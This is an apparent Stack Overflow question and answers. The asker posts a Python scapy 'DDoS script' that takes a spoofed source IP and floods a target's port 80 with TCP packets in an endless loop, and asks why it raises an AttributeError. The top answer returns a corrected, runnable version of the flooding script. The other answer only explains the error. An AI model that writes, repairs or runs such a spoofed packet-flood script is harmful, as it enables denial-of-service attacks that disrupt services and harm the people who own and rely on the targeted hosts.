# Why am I getting an AttributeError when in initiating `scapy.all.IP` with `source_IP` argument?

Tags: python, scapy, attributeerror

I have found a DDoS script that is written in python. This is the script:

```
from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1

while True:
   IP1 = IP(source_IP = source_IP, destination = target_IP)
   TCP1 = TCP(srcport = source_port, dstport = 80)
   pkt = IP1 / TCP1
   send(pkt, inter = .001)
   
   print ("packet sent ", i)
i = i + 1
```

But when I run it, I get this error:

```
Traceback (most recent call last):
  File "/home/kai/DDOS-X/main.py", line 8, in <module>
    IP1 = IP(source_IP = source_IP, destination = target_IP)
  File "/home/kai/.local/lib/python3.9/site-packages/scapy/base_classes.py", line 389, in __call__
    i.__init__(*args, **kargs)
  File "/home/kai/.local/lib/python3.9/site-packages/scapy/packet.py", line 180, in __init__
    raise AttributeError(fname)
AttributeError: source_IP
```

Comment: Are you trying to spoof / fake your source ip?

Answer (score 2):

This answer is just the extension of the answer from @ruohola, he is right in newer version of scapy the attribute names are changed so in your code

1. `source_IP` changes to `src`
2. `destination` changes to `dst`
3. `srcport` changes to `sport`
4. `dstport` changes to `dport`

Your final code

```
from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1

while True:
   IP1 = IP(src = source_IP, dst = target_IP)
   TCP1 = TCP(dport = 80, sport=source_port)
   pkt = IP1 / TCP1
   send(pkt, inter = .001)
   
   print ("packet sent ", i)
i = i + 1
```

My scapy version is following

> scapy==2.4.5

you can check yours by typing following in a shell:

```
pip freeze | grep "scapy"
```

Answer (score 1):

The error happens, because `IP` class doesn't take a `source_IP` argument.

[Source code for `IP`](https://github.com/secdev/scapy/blob/36448129bf99e52b0b2117edd1210eecac1dae36/scapy/layers/inet.py#L502)

[Source code for `Packet.__init__`](https://github.com/secdev/scapy/blob/36448129bf99e52b0b2117edd1210eecac1dae36/scapy/packet.py#L129) (`IP` inherits its `__init__` from this)

And here is the line where the `AttributeError` is raised: https://github.com/secdev/scapy/blob/36448129bf99e52b0b2117edd1210eecac1dae36/scapy/packet.py#L180